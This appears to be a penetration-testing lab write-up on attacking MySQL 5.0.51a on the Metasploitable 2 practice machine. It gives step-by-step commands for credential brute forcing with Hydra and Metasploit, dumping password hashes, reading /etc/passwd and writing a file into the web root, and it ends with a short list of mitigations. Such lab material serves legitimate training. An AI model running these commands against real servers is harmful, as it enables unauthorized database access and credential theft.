01
Vulnerability Overview
MySQL 5.0.51a on Metasploitable 2 allows login using weak or default credentials. Once authenticated, attackers can enumerate databases, extract user credentials, or use file write features for privilege escalation.
Default or weak MySQL credentials are a common misconfiguration. Successful login allows database enumeration and potential file system access.
02
Service Detection
bash
nmap -sV -v -p 3306 <target-ip>
03
Credential Brute Force
Use Hydra to brute force MySQL credentials:
bash
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<target-ip>
Common credentials: root/root, root/toor, etc.
04
Database Access & Enumeration
Connect to MySQL and enumerate databases:
bash
mysql -h <target-ip> -u root -p SHOW DATABASES; USE mysql; SELECT user,password FROM user;
05
File Write Exploitation
Use LOAD_FILE and INTO OUTFILE for file operations:
sql
SELECT LOAD_FILE('/etc/passwd');
SELECT '' INTO OUTFILE '/var/www/phpinfo.php';
06
Automated Exploitation — Metasploit
bash
msfconsole use auxiliary/scanner/mysql/mysql_login set RHOSTS <target-ip> set USERNAME root set PASS_FILE /usr/share/wordlists/metasploit/unix_users.txt run
07
Results & Impact
Outcome
- Successfully brute forced MySQL credentials
- Gained root access to database
- Extracted user credentials from mysql.user table
- Used file write capabilities for web shell upload
- Potential for further privilege escalation
Detection & Mitigation (Blue Team)
- Change default MySQL root password
- Restrict MySQL to localhost connections
- Disable FILE privilege for MySQL users
- Use firewall to block port 3306 externally
- Monitor MySQL logs for suspicious queries